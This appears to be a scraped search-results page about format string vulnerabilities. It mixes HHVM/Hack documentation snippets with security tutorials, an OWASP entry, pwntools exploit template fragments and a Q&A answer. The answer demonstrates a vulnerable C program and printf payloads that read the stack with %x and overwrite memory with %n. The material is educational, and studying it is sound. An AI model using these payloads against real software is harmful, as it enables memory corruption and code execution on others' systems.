🌐
Hhvm
docs.hhvm.com › format strings
Format Strings | Hack & HHVM Documentation
$string = "Number is: %d"; // Typechecker error: Only string literals are allowed here. Str\format($string, 1);
🌐
HackTricks
hacktricks.wiki › home › binary exploitation › format strings
Format Strings - HackTricks
3 weeks ago - Note that you cannot put the address 0x8048000 at the beginning of the input because the string will be cat in 0x00 at the end of that address. To find the offset to your input you could send 4 or 8 bytes (0x41414141) followed by %1$x and increase the value till retrieve the A's. ... # Code from https://www.ctfrecipes.com/pwn/stack-exploitation/format-string/data-leak from pwn import * # Iterate over a range of integers for i in range(10): # Construct a payload that includes the current integer as offset payload = f"AAAA%{i}$x".encode() # Start a new process of the "chall" binary p = process("
🌐
Infosec Institute
resources.infosecinstitute.com › topic › exploiting-format-strings-part-1
Format String Vulnerabilities | Infosec
July 1, 2016 - A developer wishing to echo a user’s input back to the command line may choose to use a simple statement like printf(input”); . Since the user input is likely a C string (or can be converted to one easily), this won’t throw any errors. However, this design gives the user control over how the printf function works and enables them to use format string specifiers.
🌐
OWASP Foundation
owasp.org › www-community › attacks › Format_string_attack
Format string attack | OWASP Foundation
The Format String exploit occurs when the submitted data of an input string is evaluated as a command by the application.
🌐
HackTricks
book.hacktricks.xyz › binary-exploitation › format-strings › format-strings-template
Format Strings Template - HackTricks
August 18, 2024 - Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos. from pwn import * from time import sleep ################### ### CONNECTION #### ################### # Define how you want to exploit the binary LOCAL = True REMOTETTCP = False REMOTESSH = False GDB = False # Configure vulnerable binary LOCAL_BIN = "./tyler" REMOTE_BIN = "./tyler" #For ssh # In order to exploit the format string you may need to append/prepend some string to the payload # configure them here PREFIX_PAYLOAD = b"" SUFFIX_PAYLOAD = b"" NNUM_ALREADY_WRITTEN_BYTES = 0 MAX_LENTGH = 999999 #Big
🌐
Gitbook
security-vault.gitbook.io › hacking-methodology › binary-exploitation › format_string
Format String Vulnerability | hacking-methodology
This is a code to simulate the Hack The Box racecar challenge. ... In the actual challenge the flag was in the file and its contents were put onto the stack. ... We could now read the As in hex format (0x41) and can note that they start at offset 8. The challenge was a bit more complex, this is just for demonstration purposes · https://owasp.org/www-community/attacks/Format_string_attack
🌐
GitHub
github.com › hhvm › user-documentation › issues › 209
GitHub · Where software is built
December 13, 2015 - Document format string verification (queryf, sprintf, etc), and document HH\FormatString + how to implement it#209
Author   hhvm
🌐
Hhvm
docs.hhvm.com › string
String | Hack & HHVM Documentation
users expect functions such as Str\format() and Str\uppercase() to be pure, however they can not be when they depend on the current locale, which is effectively a global variable. use the non-_l variants of functions when generating strings intended for machines to read.
🌐
Hacking Lab
hackinglab.cz › en › blog › format-string-vulnerability
Format String Vulnerability - Hacking Lab
October 21, 2024 - When exploited, an attacker can modify memory and even execute custom code in addition to reading memory. This article discusses the principle and possibilities of exploiting format string vulnerabilities, particularly in the C and C++ languages.
Find elsewhere
🌐
Synacktiv
synacktiv.com › en › publications › exploiting-a-blind-format-string-vulnerability-in-modern-binaries-a-case-study-from
Exploiting a Blind Format String Vulnerability in Modern Binaries: A
Using the format string specifier %*X$c, we could read a value at a specific stack offset (such as the return address) and store it in the internal "character counter". We then incrementally adjusted this value with the %Y$c format specifier ...
🌐
DEF CON
defcon.org › images › defcon-18 › dc-18-presentations › Haas › DEFCON-18-Haas-Adv-Format-String-Attacks.pdf pdf
Advanced Format String Attacks Presented by Paul Haas
The largest hacking and security conference with presentations, workshops, contests, villages and the premier Capture The Flag Contest.
🌐
Medium
nikhilh20.medium.com › format-string-exploit-ccefad8fd66b
Format String Exploit. One of the most commonly used functions… | by ka1d0 | Medium
February 12, 2019 - If printf() is provided with format strings, it expects to see associated variables in the printf() call statement. If the programmer doesn't specify the variables, printf() will still try to read a value, return address + 8 bytes. It ends up reading data off the stack. I came across a format string vulnerability based problem in picoCTF 2018.
🌐
GitHub
github.com › Gottiee › Hack-Tools › blob › main › pwn › format-string.md
Hack-Tools/pwn/format-string.md at main · Gottiee/Hack-Tools
Format string exploit vulnerabilities in programs by abusing the '%x' power, reading and writing int the stack with printf() and sprintf() functions.
Author   Gottiee
🌐
Null Byte
null-byte.wonderhowto.com › how-to › security-oriented-c-tutorial-0x14-format-string-vulnerability-part-buffer-overflows-nasty-little-brother-0167254
Security-Oriented C Tutorial 0x14 - Format String Vulnerability Part I: Buffer Overflow's Nasty Little Brother :: Null Byte
December 26, 2015 - Our buf variable is at 0xffffd030 and holds the format string parameter of printf. We can see that the stack holds the other arguments which correspond to our xs in the correct, reverse order and lastly, the address of buf right at the top.
🌐
GitHub
github.com › facebook › hhvm › issues › 2122
Hack format string checker only handles the most basic of formats · Issue #2122 · facebook/hhvm
March 21, 2014 - The Hack checker for format strings (like printf and sprintf) only handles the most basic specifiers. This means that using positionals doesn't work, neither does padding or alignment or any other part of the formatting mini-language.
Author   facebook
Top answer
1 of 6
98

You may be able to exploit a format string vulnerability in many ways, directly or indirectly. Let's use the following as an example (assuming no relevant OS protections, which is very rare anyways):

int main(int argc, char **argv)
{
    char text[1024];
    static int some_value = -72;

    strcpy(text, argv[1]); /* ignore the buffer overflow here */

    printf("This is how you print correctly:\n");
    printf("%s", text);
    printf("This is how not to print:\n");
    printf(text);

    printf("some_value @ 0x%08x = %d [0x%08x]", &some_value, some_value, some_value);
    return(0);
}

The basis of this vulnerability is the behaviour of functions with variable arguments. A function which implements handling of a variable number of parameters has to read them from the stack, essentially. If we specify a format string that will make printf() expect two integers on the stack, and we provide only one parameter, the second one will have to be something else on the stack. By extension, and if we have control over the format string, we can have the two most fundamental primitives:


Reading from arbitrary memory addresses

[EDIT] IMPORTANT: I'm making some assumptions about the stack frame layout here. You can ignore them if you understand the basic premise behind the vulnerability, and they vary across OS, platform, program and configuration anyways.

It's possible to use the %s format parameter to read data. You can read the data of the original format string in printf(text), hence you can use it to read anything off the stack:

./vulnerable AAAA%08x.%08x.%08x.%08x
This is how you print correctly:
AAAA%08x.%08x.%08x.%08x
This is how not to print:
AAAA.XXXXXXXX.XXXXXXXX.XXXXXXXX.41414141
some_value @ 0x08049794 = -72 [0xffffffb8]

Writing to arbitrary memory addresses

You can use the %n format specifier to write to an arbitrary address (almost). Again, let's assume our vulnerable program above, and let's try changing the value of some_value, which is located at 0x08049794, as seen above:

./vulnerable $(printf "\x94\x97\x04\x08")%08x.%08x.%08x.%n
This is how you print correctly:
??%08x.%08x.%08x.%n
This is how not to print:
??XXXXXXXX.XXXXXXXX.XXXXXXXX.
some_value @ 0x08049794 = 31 [0x0000001f]

We've overwritten some_value with the number of bytes written before the %n specifier was encountered (man printf). We can use the format string itself, or field width to control this value:

./vulnerable $(printf "\x94\x97\x04\x08")%x%x%x%n
This is how you print correctly:
??%x%x%x%n
This is how not to print:
??XXXXXXXXXXXXXXXXXXXXXXXX
some_value @ 0x08049794 = 21 [0x00000015]

There are many possibilities and tricks to try (direct parameter access, large field width making wrap-around possible, building your own primitives), and this just touches the tip of the iceberg. I would suggest reading more articles on fmt string vulnerabilities (Phrack has some mostly excellent ones, although they may be a little advanced) or a book which touches on the subject.


Disclaimer: the examples are taken [although not verbatim] from the book Hacking: The art of exploitation (2nd ed) by Jon Erickson.

2 of 6
21

It is interesting that no-one has mentioned the n$ notation supported by POSIX. If you can control the format string as the attacker, you can use notations such as:

"%200$p"

to read the 200th item on the stack (if there is one). The intention is that you should list all the n$ numbers from 1 to the maximum, and it provides a way of resequencing how the parameters appear in a format string, which is handy when dealing with I18N (L10N, G11N, M18N*).

However, some (probably most) systems are somewhat lackadaisical about how they validate the n$ values and this can lead to abuse by attackers who can control the format string. Combined with the %n format specifier, this can lead to writing at pointer locations.


* The acronyms I18N, L10N, G11N and M18N are for internationalization, localization, globalization, and multinationalization respectively. The number represents the number of omitted letters.

🌐
Null Byte
null-byte.wonderhowto.com › how-to › exploit-development-read-write-programs-memory-using-format-string-vulnerability-0181919
Exploit Development: How to Read & Write to a Program's Memory Using a Format String Vulnerability :: Null Byte
January 30, 2018 - The secret ingredient in the format string is the format specifier. The format specifier is the %d in the command we just wrote. When the program sees a format specifier, it knows to expect a variable to replace that specifier.
🌐
Infosec Institute
infosecinstitute.com › resources › hacking › exploiting-format-strings-getting-the-shell
Exploiting format strings: Getting the shell | Infosec
July 5, 2016 - We will now be using format specifier "u" to write decimal values directly to the memory locations.